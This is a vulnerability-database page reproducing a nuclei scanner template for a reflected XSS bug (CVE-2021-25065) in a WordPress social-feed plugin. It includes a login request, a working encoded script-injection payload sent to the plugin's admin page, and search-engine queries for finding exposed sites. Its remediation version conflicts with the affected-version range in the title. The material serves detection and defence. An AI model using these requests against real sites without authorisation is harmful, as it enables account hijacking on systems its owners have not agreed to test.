Lucene search
K

Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Smash Balloon Social Post Feed < 4.1.1 - Reflected XSS in cff-top admin pag

Related
Refs
Code
id: CVE-2021-25065

info:
  name: Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
  impact: |
    An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 2.19.2
  reference:
    - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc
    - https://wordpress.org/plugins/custom-facebook-feed/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-25065
    cwe-id: CWE-79
    epss-score: 0.01217
    epss-percentile: 0.64955
    cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: smashballoon
    product: smash_balloon_social_post_feed
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/
    fofa-query: body=/wp-content/plugins/custom-facebook-feed/
    publicwww-query: "/wp-content/plugins/custom-facebook-feed/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<img src onerror=alert(document.domain)>")'
          - 'contains(body_2, "custom-facebook-feed")'
        condition: and
# digest: 4a0a00473045022023de08eb93d6c8f4eb5baa798cc9d73b52e9a8e60402abf139e3c51cd3da1a600221009922afba11e310c6752ba99e3bd6933a238bbd55b7874285c2a9f400199f3aeb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 23.5
CVSS 3.15.4
EPSS0.01217
19